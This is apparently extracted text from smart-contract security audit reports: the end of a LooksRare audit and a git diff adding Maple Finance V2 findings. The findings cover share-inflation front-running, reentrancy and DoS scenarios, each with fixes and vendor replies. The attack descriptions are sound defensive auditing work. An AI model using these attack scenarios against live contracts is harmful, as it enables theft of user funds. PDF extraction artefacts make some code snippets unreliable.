Fixed in PR 307. Spearbit: Verified. +5.5.28 Code duplicates Severity: Informational Description: * In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLa- tency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactor- ing this code into a helper function. Otherwise, it would be better to use only one version of the two code snippets across the protocol. • The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented at a higher level once, such as in a common function or class that can be reused among the different strategies. • _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code. • TakerBid, TakerAsk can be merged into a single struct. • MakerBid, MakerAsk can be merged into a single struct. Recommendation: It is advisable to avoid duplicating code by having a single, centralized version that can be easily maintained and updated. This also helps ensure consistency in validation and reduces the likelihood of bugs or errors. LooksRare: • Point 1 was fixed in PR 310. • Points 2 and 5 were fixed in PR 305 • Point 3 was fixed in PR 430 • Point 4 was fixed in PR 383 Spearbit: Verified. 76 +5.5.29 Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs Severity: Informational Context: ExecutionManager.sol#L124 ExecutionManager.sol#L210 TransferSelectorNFT.sol#L89 Description: Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety, return data size checks, and won't revert for calls to Externally Owned Accounts. Recommendation: Make sure to use Interfaces to facilitate external calls when possible, otherwise, you should consider adding a check to validate that an address is not an EOA before calling it (the check implemented in StrategyManager.sol#L71-L73 is a good example of how to implement that) LooksRare: Partially resolved in PR 308 by replacing the low-level call to transferManager with a high-level call. Spearbit: Verified and acknowledged that it is partially resolved as low-level calls are still in use for strategies. +5.5.30 Insufficient input validation of orders (especially on the Taker's side) Severity: Informational Description: There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue. • Missing validation of strategyId • Missing validation of collection • Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: I filed a related issue for the ItemIdsRange strategy, which I think is more severe of an issue because the mismatched lengths can actually be returned from the function). Recommendation: Consider adding validation checks also for the parameters mentioned above, mainly for con- sistency reasons. LooksRare: Acknowledged. Spearbit: Acknowledged. +5.5.31 LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strat- egyIds Severity: Informational Context: • StrategyManager.sol#L55 • ExecutionManager.sol#L210-L212 • ExecutionManager.sol#L124-L126 Description: If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers. Recommendation: The above should be highlighted for makers. For example, calls to checkMakerAskOrderVa- lidity or checkMakerBidOrderValidity would return validationCodes[0] == STRATEGY_NOT_IMPLEMENTED for a maker which should signal them to not sign the order. 77 LooksRare: Yes, it will be highlighted. By definition, it is possible to do anything in signatures since these exist purely off chain. A similar finding would exist with asset types as well. Spearbit: Acknowledged. +5.5.32 Strategies with faulty price feeds can have unwanted consequences Severity: Informational Context: • StrategyUSDDynamicAsk.sol#L92 • StrategyFloorFromChainlink.sol#L370 Description: In LooksRare protocol once a strategy has been added its implementation and selector cannot be updated. This is a good since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including them into their orders. Some strategies might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can have a slight deviation from their original intent. Case StrategyUSDDynamicAsk If the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by MakerAsk's minimum price. But the maker would not receive the expected amount if the correct price was reported and was greater than the maker's minimum ask. Case StrategyFloorFromChainlink For executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollec- tionOfferStrategyWithTakerAsk if the price feeds reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid if the price feeds report a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium). Recommendation: The above scenarios regarding the strategies depending on external price feeds would need to be documented/commented for the users. LooksRare: Acknowledged. Spearbit: Acknowledged. +5.5.33 The provided price to IERC2981.royaltyInfo does not match the specifications Severity: Informational Context: • CreatorFeeManagerWithRebates.sol#L52 • CreatorFeeManagerWithRoyalties.sol#L57 In both if Description: royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameters provided to this endpoint do not match the specification of EIP-2981: CreatorFeeManagerWithRoyalties, CreatorFeeManagerWithRebates and /// @param _salePrice - the sale price of the NFT asset specified by _tokenId 78 The price provided in viewCreatorFeeInfo functions, is the price for the whole batch of itemIds and not the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) would all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch. An example is that if the royalty is not percentage-based, but a fixed price. Recommendation: There isn't a way around the above issue (since given a price for the whole batch, there isn't a unique price distribution that sums up to the given price) unless one adopts a different EIP/strategy. In general, there are cases in which we might pay more or less royalty than actually specified. It would be best to comment and document the above issue if the protocol decides to use the current strategies. LooksRare: Acknowledged but there is (unfortunately) no standard to properly handle bundles. Spearbit: Acknowledged. +5.5.34 Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety Severity: Informational Context: • CreatorFeeManagerWithRebates.sol#L52 • CreatorFeeManagerWithRoyalties.sol#L57 • OrderValidatorV2A.sol#L605 • OrderValidatorV2A.sol#L622 • OrderValidatorV2A.sol#L634 • OrderValidatorV2A.sol#L676 • OrderValidatorV2A.sol#L690 • OrderValidatorV2A.sol#L709 • OrderValidatorV2A.sol#L787 • OrderValidatorV2A.sol#L878 also applies to lowLevelCallers Description: In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not guarantee that mismatched types are used for the input parameters. Recommendation: It would be best to use abi.encodeCall to ensure type and typo safety. So the code in this context can be transformed from abi.encodeWithSelector(..selector, , ..., ) to: abi.encodeCall(., (, ..., )) The recommendation does not apply to: • ExecutionManager.sol#L125 • ExecutionManager.sol#L211 • TransferSelectorNFT.sol#L90 LooksRare: Fixed in PR 298. Spearbit: Verified. 79 +5.5.35 Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash Severity: Informational Context: • OrderStructs.sol#L14 • OrderStructs.sol#L20 • OrderStructs.sol#L26 Description: Hardcoded byte32 EIP-712 type hashes are defined in the OrderStructs library. Recommendation: Use the compile-time inlined keccak256 with the formatting below to avoid possible future mistakes // an example without an inner struct field struct ExampleStruct { type1 f1; type2 f2; ... typeN fn; } bytes32 internal constant _EXAMPLE_HASH = keccak256( "ExampleStruct(" "type1 f1," "type2 f2," ... "typeN fn" ")" ); LooksRare: PR 297. Spearbit: Verified. 80 diff --git a/findings_newupdate/spearbit/MapleV2.txt b/findings_newupdate/spearbit/MapleV2.txt new file mode 100644 index 0000000..483999b --- /dev/null +++ b/findings_newupdate/spearbit/MapleV2.txt @@ -0,0 +1,52 @@ +5.1.1 First pool depositor can be front-run and have part of their deposit stolen Severity: High Risk Context: pool-v2::Pool.sol#L73 Description: The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor: (shares_ * totalAssets()) / totalSupply_ Example: • The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction. • The attacker front runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1. • When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 shares (rounded down from 1.9999...). • The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit. During the migration, an _initialSupply of shares to be airdropped are already minted at initialization and are not affected by this attack. Recommendation: Require a minimum initial shares amount for the first deposit by adjusting the initial mint (when totalSupply == 0) such that: • mint an INITIAL_BURN_AMOUNT of shares to a dead address like address zero. • only mint depositAmount - INITIAL_BURN_AMOUNT to the recipient. INITIAL_BURN_AMOUNT needs to be chosen large enough such that the cost of the attack is not profitable for the attacker when minting low share amounts but low enough that not too many shares are stolen from the user. We recommend using an INITIAL_BURN_AMOUNT of 1000. Spearbit: Here's the script that I used to check the values for different scenarios. Maple: What do you guys think of this approach? #210. Basically, instead of stealing a small amount of assets from the first depositor to mint shares to a nonexistent address, thereby throwing those assets away forever, and asymmetrically harming just the first honest depositor, this PR just "assumes" an amount of shares was minted backed by an equal amount of assets. This way, the starting rate is still 1 share per asset, but no real assets are locked away behind any irredeemable shares. It makes the code more complicated, you need to add this amount to assets and totalSupply Spearbit: everywhere and may not forget it. Now there's suddenly a discrepancy between pool.totalAssets() and PM.totalAssets(). It is also problematic when assets & totalSupply contain "virtual" balances that are not in the contract as it breaks invariants like asset.balanceOf(pool) + LM.assetsUnderManagement() == pool.totalAssets() and you need to make sure that it's impossible to transfer out these virtual balances, as it would revert. Which is an issue in your case. Let's say you start with a virtual balance of 1000 supply / 1000 assets, then I deposit 1000 assets and get an- other 1000 shares. A loan is funded with my 1000 assets but they default and only 500 assets are recovered. Now I withdraw my 1000 shares and should get a transfer out of shares * (totalAssets + BOOTSTRAP_MINT) / (totalSupply + BOOTSTRAP_MINT) = 1000 * (500 + 1000 virtual) / 2000 = 750 yet there's only 500 in the contract. This only happens because you have a virtual balance that is not backed by actual assets. If the first depositor deposited these funds you could get out your entire 750. In our opinion, it's okay to "steal" less than 1 cent from the first depositor, they're already paying $5 in gas fees. What you could think about is to have the PoolDeployer always be the first depositor, keep a small funds balance in it, and do a funds.transferFrom + mint for them in the pool constructor. 5 Maple: This is our current working PR #219 note there are still some comments to be addressed but you can see the approach we are taking. Merged PR: #219 ready for review. Merged this as well to make the mint param globally configurable by the governor: #40. Spearbit: Fixed. 5.2 Medium Risk +5.2.1 Users depositing to a pool with unrealized losses will take on the losses Severity: Medium Risk Context: pool-v2::Pool.sol#L278, pool-v2::Pool.sol#L275 Description: The pool share price used for deposits is always the totalAssets() / totalSupply, however the pool share price when redeeming is totalAssets() - unrealizedLosses() / totalSupply. The unrealized- Losses value is increased by loan impairments (LM.impairLoan) or when starting triggering a default with a liq- uidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or are realized. liquidation. Recommendation: Make it very clear to the users when there are unrealized losses and communicate that it is a bad time to deposit. Furthermore, consider adding an expectedMinimumShares parameter that is checked against the actual minted shares. This ensures that users don't accidentally lose shares when front-run. Note that this would need to be a new deposit(uint256 assets_, address receiver_, uint256 expectedMinimumShares_) function to not break the ERC4626 compatibility. The Pool.mint function has a similar issue, whereas the Pool.mintWithPermit function already ac- cepts a maxAssets_ parameter. Maple: Yes our team is aware of this issue and plan on making it very clear to users through our front end and documentation that it is not recommended depositing while there are unrealized losses. The alternative of not using two exchange rates introduces another vulnerability which is that users could front run a payment or reversion of an impairment and make a large amount off of the exchange rate change. Spearbit: Acknowledged. +5.2.2 TransitionLoanManager.add does not account for accrued interest since last call Severity: Medium Risk Context: pool-v2::TransitionLoanManager.sol#L74 Description: The TransitionLoanManager.add advances the domain start but the accrued interest since the last domain start is not accounted for. If add is called several times, the accounting will be wrong. It therefore wrongly tracks the _accountedInterest variable. Recommendation: Consider tracking the accrued interest or ensure that the MigrationHelper.addLoansToLM is called only once in the final migration script, adding all loans at the same time. 6 function add(address loan_) external override nonReentrant { ... uint256 domainStart_ = domainStart; uint256 accruedInterest; if (domainStart_ == 0 || domainStart_ != block.timestamp) { accruedInterest = getAccruedInterest(); domainStart = _uint48(block.timestamp); } ... _updateIssuanceParams(issuanceRate += newRate_, accountedInterest + accruedInterest); + + + } This mimics LoanManager._advanceGlobal as long as there are no late payments but that's also the case for TransitionLoanManager as one of the preconditions for the migration is that loans have at least 5 days for any payment to be due. Maple: In theory yes, but realistically we'll add all loans atomically. Even in the largest pool, we have around 30 active loans, which is feasible to do in one transaction. This is not an issue since all loans are added atomically, but we can add this functionality to be defensive on the TLM side. Spearbit: Not fixed, see comment. Maple: Here is the PR for the fix to your comment #218. Spearbit: Fixed. +5.2.3 Unaccounted collateral is mishandled in triggerDefault Severity: Medium Risk Context: pool-v2::LoanManager.sol#L563 Description: The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_- ).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overes- timation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 Wei of collateralAsset to the loan itself. In liq- uidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator. Recommendation: In both cases, use the collateral token's balanceOf function to measure the amount of collat- eral tokens in the loan, for example: - if (IMapleLoanLike(loan_).collateral() == 0 || IMapleLoanLike(loan_).collateralAsset() == fundsAsset) { ,! + address collateralAsset_ = IMapleLoanLike(loan_).collateralAsset(); + if (IERC20Like(collateralAsset_ ).balanceOf(loan_) == 0 || collateralAsset_== fundsAsset) { Maple: Fixed in #211. Spearbit: Fixed. 7 +5.2.4 Initial cycle time is wrong when queuing several config updates Severity: Medium Risk Context: withdrawal-manager::WithdrawalManager.sol#L123 Description: The initial cycle time will be wrong if there's already an upcoming config change that changes the cycle duration. Example: currentCycleId: 100 config[0] = currentConfig = {initialCycleId: 1, cycleDuration = 1 days} config[1] = {initialCycleId: 101, cycleDuration = 7 days} Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days. Recommendation: Optimistically "apply" (just for the computation, not actually activate it) any pending configs for a cycle ID and then sum up the cycle durations for the cycles [currentCycleId, currentCycleId + 1, cur- rentCycleId + 2]. Add the result to getWindowStart(currentCycleId_). Maple: Fixed in #50. Spearbit: Fixed. 5.3 Low Risk +5.3.1 Users cannot resubmit a withdrawal request as per the wiki Severity: Low Risk Context: manager::WithdrawalManager.sol#L151-L176, pool-v2::Pool.sol#L210-L224, Description: As per Maple's wiki: pool-v2::PoolManager.sol#371-L382, withdrawal- • Refresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0). However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ pa- rameter is zero. Recommendation: Consider removing the below require statement found in Pool._requestRedeem(). function _requestRedeem(uint256 shares_, address owner_) internal returns (uint256 escrowShares_) { - ... require(shares_ != 0, "P:RR:ZERO_SHARES"); Maple: Issue addressed in #PR 183. Spearbit: The PR introduced an issue where anyone can DoS the withdrawal process by front-running calls to process a share redemption with a call to requestRedeem(), thereby refreshing the request before the user is able to process a withdrawal. The fix here does not sufficiently cover the edge case where a non-owner account can arbitrarily push a user's request to redeem shares back by two cycles. Any call to process a redemption can be front-run because a new request can be made as long as block.timestamp >= getWindowStart(exitCycleId_). Making a new request to redeem shares with zero as a parameter can be done by any user as it does not require them to be the owner, nor does it expect the caller to have an approved amount. If a user can perpetually front-run a user's attempt to redeem shares, it would be a valid DoS attack on the withdrawal manager. 8 Maple: But if you check out Pool.sol in the _requestRedeem() helper function we do check if the msg.sender != owner and use an allowance in that case Pool.sol#L230. Does this address your concern? Spearbit: We would be explicitly requesting to redeem zero shares. The allowance checks will not revert because we don't need a pre-approved amount for this to execute. Maple: We'll have stand up in a few hours so I can discuss with the team how best to fix it, do you folks have a suggestion? Spearbit: The only suggestion that makes the most sense is to only allow the owner to refresh a request. Maple: Fixed in #PR 232 by only allowing the owner or an approved EOA to refresh their request. Spearbit: Fixed. +5.3.2 Accrued interest may be calculated on an overstated payment Severity: Low Risk Context: migration-helpers::AccountingChecker.sol#L50-L51 Description: The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will also be excluded from the total interest calculation. Recommendation: Consider capping the time delta maximum to the payment interval. include late interest, it may also be useful to add this calculation to the total interest amount. If it is also intended to Maple: Acknowledged, won't address as this contract will be only used during migration during which we will have no late loans. Spearbit: Acknowledged. +5.3.3 No deadline when liquidating a borrower's collateral Severity: Low Risk Context: liquidations::Liquidator.sol#L86-L103 Description: A loan's collateral is liquidated in the event of a late payment or if the pool delegate impairs a loan If the loan contains any amount of collateral (assuming it is different to the due to insolvency by the borrower. funds' asset), the liquidation process will attempt to sell the collateral at a discounted amount. Because a liquidation is considered active as long as there is remaining collateral in the liquidator contract, a user can knowingly liquidate all but 1 wei of collateral. As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation(). Recommendation: Consider adding a deadline to the liquidation process. After this time period has passed, any leftover amount can be claimed by the protocol's treasury, allowing for liquidation finalization. This function hook can be added to the existing LoanManager.finishCollateralLiquidation() as an edge case. Maple: Reevaluated, and will not address as it is solvable by performing a transaction to liquidate remaining amount. Inconvenient but not an issue really. Spearbit: Acknowledged. 9 +5.3.4 Loan impairments can be unavoidably unfair for borrowers Severity: Low Risk Context: loan::MapleLoan.sol#L859, pool-v2::LoanManager.sol#L233 Description: When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of If the pool delegate later decides to remove the im- block.timestamp and the current _nextPaymentDueDate. pairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds away from the original due date). Recommendation: Ensure that these subtleties are documented and made clear to borrowers. Also, consider mitigating this unfair behavior. This can be done by restoring _nextPaymentDueDate when a borrower makes a payment on an impaired loan, and by explicitly enforcing that a loan can never be liquidated before the next payment's original due date. Maple: Discussed with business team and we want to keep as is, this will be in the loan agreements with the borrowers. Spearbit: Acknowledged. +5.3.5 withdrawCover() vulnerable to reentrancy Severity: Low Risk Context: pool-v2 (v1.0.0-rc.1)PoolManager.sol#L407 Description: withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some In this case, the pool delegate could reenter the tokens allow for callbacks before the actual transfer is made. withdrawCover() function and bypass the balance check as it is made before tokens are actually transferred. This can be repeated to empty out required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol controlled contract, hence the low severity. Recommendation: This can be mitigated by moving the balance check below the moveFunds() line: @@ -397,15 +398,15 @@ contract PoolManager is IPoolManager, MapleProxiedInternals, PoolManagerStorage require(msg.sender == poolDelegate, "PM:WC:NOT_PD"); - - require( amount_ <= (IERC20Like(asset).balanceOf(poolDelegateCover) - IMapleGlobalsLike(globals()).minCoverAmount(address(this))), ,! - "PM:WC:BELOW_MIN" - ); recipient_ = recipient_ == address(0) ? msg.sender : recipient_; IPoolDelegateCoverLike(poolDelegateCover).moveFunds(amount_, recipient_); require( IERC20Like(asset).balanceOf(poolDelegateCover) >= IMapleGlobalsLike(globals()).minCoverAmount(address(this)), "PM:WC:BELOW_MIN" ); + + ,! + + Maple: Fixed in #188. Spearbit: Fixed. 10 +5.3.6 Bad parameter encoding and deployment when using wrong initializers Severity: Low Risk Context: pool-v2 (v1.0.0-rc.1)::PoolDeployer.sol#L32-L77 Description: The initializers used to encode the arguments, when deploying a new pool in PoolDeployer, might not be the initializers that the proxy factory will use for the default version and might lead to bad parameter encoding & deployments if a wrong initializer is passed. Recommendation: Should check the initializers while deploying a new pool: function deployPool( address[3] memory factories_, address[3] memory initializers_, address asset_, string memory name_, string memory symbol_, uint256[6] memory configParams_ ) external override returns (...) { address poolDelegate_ = msg.sender; IMapleGlobalsLike globals_ = IMapleGlobalsLike(globals); require(globals_.isPoolDelegate(poolDelegate_), "PD:DP:INVALID_PD"); factories_[0]), "PD:DP:INVALID_PM_FACTORY"); require(globals_.isFactory("POOL_MANAGER", require(globals_.isFactory("LOAN_MANAGER", factories_[1]), "PD:DP:INVALID_LM_FACTORY"); require(globals_.isFactory("WITHDRAWAL_MANAGER", factories_[2]), "PD:DP:INVALID_WM_FACTORY"); + require(initializers[0] == factories[0].migratorForPath(factories[0].defaultVersion(), factories[0].defaultVersion()), "PD:DP:INVALID_PM_INITIALIZER"); ,! + require(initializers[1] == factories[1].migratorForPath(factories[1].defaultVersion(), factories[1].defaultVersion()), "PD:DP:INVALID_LM_INITIALIZER"); ,! + require(initializers[2] == factories[2].migratorForPath(factories[2].defaultVersion(), ,! factories[2].defaultVersion()), "PD:DP:INVALID_WM_INITIALIZER"); bytes32 salt_ = keccak256(abi.encode(poolDelegate_)); ... } Maple: Fixed in #200. Spearbit: Fixed. +5.3.7 Event LoanClosed might be emitted with the wrong value Severity: Low Risk Context: loan (v4.0.0-rc.1::MapleLoan.sol#L92-L124) Description: In function closeLoan function, the fees are got by the getClosingPaymentBreakdown function and it is not adding refinances fees after in code are paid all fee by payServiceFees which may include refinances fees. The event LoanClose might be emitted with the wrong fee value. Recommendation: It is recommended to change getClosingPaymentBreakdown by adding refinances fees: 11 function getClosingPaymentBreakdown() public view override returns (uint256 principal_, uint256 ,! interest_, uint256 fees_) { uint256 paymentsRemaining_ = _paymentsRemaining; - uint256 delegateServiceFee_ = IMapleLoanFeeManager(_feeManager).delegateServiceFee(address(this)) * paymentsRemaining_; ,! - uint256 platformServiceFee_ = IMapleLoanFeeManager(_feeManager).platformServiceFee(address(this)) * paymentsRemaining_; ,! + ( + + + + + ) = IMapleLoanFeeManager(_feeManager).getServiceFeeBreakdown(address(this), paymentsRemaining_); uint256 delegateServiceFee_, uint256 delegateRefinanceServiceFee_, uint256 platformServiceFee_, uint256 platformRefinanceServiceFee_ - fees_ = delegateServiceFee_ + platformServiceFee_; + fees_ = delegateServiceFee_ + platformServiceFee_ + delegateRefinanceServiceFee_ + ,! platformRefinanceServiceFee_; ... } Maple: Fixed in #238. Spearbit: Fixed, should add a test for the event value. +5.3.8 Bug in makePayment() reverts when called with small amounts Severity: Low Risk Context: loan (v4.0.0-rc.1)::MapleLoan.sol#L167 Description: When makePayment() is called with an amount which is less than the fees payable, then the trans- action will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount() because the token balance is decremented on the previous line without updating drawable funds. Recommendation: Consider updating the logic so that drawable funds are decremented by the fees before paying them: @@ -160,11 +160,13 @@ contract MapleLoan is IMapleLoan, MapleProxiedInternals, MapleLoanStorage { uint256 principalAndInterest = principal_ + interest_; IMapleLoanFeeManager(_feeManager).payServiceFees(_fundsAsset, 1); - // The drawable funds are increased by the extra funds in the contract, minus the total needed for payment. ,! // NOTE: This line will revert if not enough funds were added for the full payment amount. - + _drawableFunds = (_drawableFunds + getUnaccountedAmount(_fundsAsset)) - principalAndInterest; _drawableFunds = (_drawableFunds + getUnaccountedAmount(_fundsAsset)) - principalAndInterest - ,! + ,! fees_; require(IMapleLoanFeeManager(_feeManager).payServiceFees(_fundsAsset, 1) == fees_, "ML:MP:INCORRECT_FEES"); Alternatively, if this behavior is desired, consider updating the NatSpec and documentation and as well as a require(amount >= fees)) check. Maple: Fixed in #250. Spearbit: Looks good. In the _handleServiceFeePayment() helper, what's the reason for the final else clause at the end? #250-diff 12 if (balanceBeforeServiceFees_ > balanceAfterServiceFees_) { _drawableFunds -= (fees_ = balanceBeforeServiceFees_ - balanceAfterServiceFees_); } else { _drawableFunds += balanceAfterServiceFees_ - balanceBeforeServiceFees_; } Not seeing how the balanceAfterServiceFees would ever be greater than balanceBeforeServiceFees when the only thing done in the middle is paying fees. The balance will either decrease by the fees paid or remain the same if fees are zero. So technically this works since it will hit the else and then add 0 to the _drawableFunds. Maple: This was just to be defensive in our design, this would never happen with the current loan. If for whatever reason the balance did increase, we simply return zero for fees_ and increment drawableFunds. Spearbit: Fixed. +5.3.9 Pool.previewWithdraw always reverts but Pool.withdraw can succeed Severity: Low Risk Context: withdrawal-manager::WithdrawalManager.sol#L400, pools-v2::Pool.sol#L117 Description: The Pool.previewWithdraw => PM. previewWithdraw => WM.previewWithdraw function call se- quence always reverts in the WithdrawalManager. However, the Pool.withdraw function can succeed. This behavior might be unexpected, especially, as integrators call previewWithdraw before doing the actual withdraw call. Recommendation: Either disable Pool.withdraw calls or implement Pool.previewWithdraw calls. Maple: Yes this is an issue, we should be using processWithdraw in the Pool => PM and reverting it. We don't want to support withdraw because of the exact shares issue. We can add this change. Spearbit: Refactor pool to use requestWithdraw and processWithdraw. Solution to #68 leads to previewWithdraw always returning zero. However, can call withdraw with a specific amount so it does not revert and returns more than 0. We do not consider the core issue of unifying the behavior of these two functions fully fixed. Maple: We merged a fix in for the issue of previewWithdraw always returning issue in #53. Spearbit: The fix in that PR is for a different issue. In #53, the fix is for the previewRedeem bug that was recently introduced where && should have been ||. The issue above is separate and is saying that previewWithdraw (on the pool) should not be reverting/returning 0 if the actual withdraw function does allow you to withdraw shares. Maple: Fixed and merged in #225. Spearbit: The PM now reverts for Pool.requestWithdraw & Pool.withdraw. The previewWithdraw function returns 0. Therefore, the behavior is still a little different but it's acceptable and indeed unclear if ERC4626 view functions should revert or return 0 in this case, see IERC426 Implementation of preview and max functions for more discussion. I find it a bit strange that getEscrowParams works for both assets_ and shares_ (see _requestRedeem). In an actual implementation, how are you going to differentiate if the second argument are shares or assets? #225. Please have a look, might be relevant for future PM upgrades that indeed return something different for each getEscrowedParams call. Maple: Good catch we are just discussing this on our call we just want to convert and just pass along shares. We're debating if we should use convertToShares or convertToExitShares on the assets_ then pass it along to getEscrowParams. We were wondering if you had a recommendation in regard to this for future upgrades? 13 Spearbit: What are your intentions with this escrow feature and how is it supposed to work? It should be con- vertToExitShares because to withdraw 1000 assets from the WM you need to burn 1000 assets converted to exit shares. So this amount should be escrowed. Maple: That should cover it #229. Spearbit: Fixed. +5.3.10 Setting a new WithdrawalManager locks funds in old one Severity: Low Risk Context: pool-v2::PoolManager.sol#L237 Description: The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck. Recommendation: Before calling this function, ensure that there are no locked shares in the current withdrawal manager. Maple: Acknowledged, will manage operationally and will capture in documentation. Addressed in Withdrawal- Mechanism#configuration-management. Spearbit: Acknowledged. +5.3.11 Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection Severity: Low Risk Context: • Liquidator.sol • MapleLoan.sol • WithdrawalManager.sol Description: whenProtocolNotPaused is added to migrate() for the Liquidator, MapleLoan, and Withdrawal- Manager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation. Recommendation: Consider moving the whenProtocolNotPaused modifier from upgrade() to migrate() since migrate() is called during both the upgrade process and the instantiation process. --- a/contracts/Liquidator.sol +++ b/contracts/Liquidator.sol @@ -52,7 +52,7 @@ contract Liquidator is ILiquidator, LiquidatorStorage, MapleProxiedInternals { - + function migrate(address migrator_, bytes calldata arguments_) external override { function migrate(address migrator_, bytes calldata arguments_) external override ,! whenProtocolNotPaused { require(msg.sender == _factory(), require(_migrate(migrator_, arguments_), "LIQ:M:FAILED"); "LIQ:M:NOT_FACTORY"); } @@ -63,7 +63,7 @@ contract Liquidator is ILiquidator, LiquidatorStorage, MapleProxiedInternals { _setImplementation(implementation_); } function upgrade(uint256 version_, bytes calldata arguments_) external override whenProtocolNotPaused { function upgrade(uint256 version_, bytes calldata arguments_) external override { - ,! + Maple: Fixed in these PRs: • #245 14 • #213 • #214 • #215 • #52 • #54 This actually has introduced a problem, if there is no migrator contract, this will not revert on pause for either upgrade or deploy. ProxyFactory.sol#L26. Thinking of the best approach to this, thinking it might be worth adding a pause in the MPF itself. Spearbit: Adding a pause to the MPF would mean you can never deploy/upgrade any contract while the protocol is paused? But maybe you want to be able to do that for some contracts/migrations. If you want to do the same as now and keep the responsibility of whether you allow migrations during pause in the implementation contract, there's also another approach: Always call proxy.migrate in MLF even with a zero-address for initializer but then do nothing in ProxiedInternals._migrate (more specifically, return true if migrator_ == 0 and arguments_ is empty). Maple: We have learnt towards adding the pause to MPF, in the case of a protocol pause we can always bundle transactions if we need to upgrade. Here is the PR for the update #38 To summarize, we will be reverting the changes in the rest of the repos to remove pausing functionality from both upgrade and migrate since they will be in the MPF. These reversions will be made everywhere except the Loan, since the LoanFactory is already deployed on mainnet. #38 is merged. #214 closed this as it is no longer relevant. Spearbit: - pause added to MPF in #38. • pause removed from PM/LM here: #222. • pause removed from WM here: #54. • pause removed from Liquidator here: #55. • Loan now has pause on migrate or on upgrade like it was before? In current main, it's still on upgrade but ok. Just making sure you're aware in case you intended to change that. Maple: Yes that change was intended and to have it on upgrade as we won't be updating the Loan factory in production. We're fine with new loans being created during a protocol pause. Spearbit: Fixed. +5.3.12 Missing post-migration check in PoolManager.sol could result in lost funds Severity: Low Risk Context: pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L59-L62 Description: The protocol employs an upgradeable/migrateable 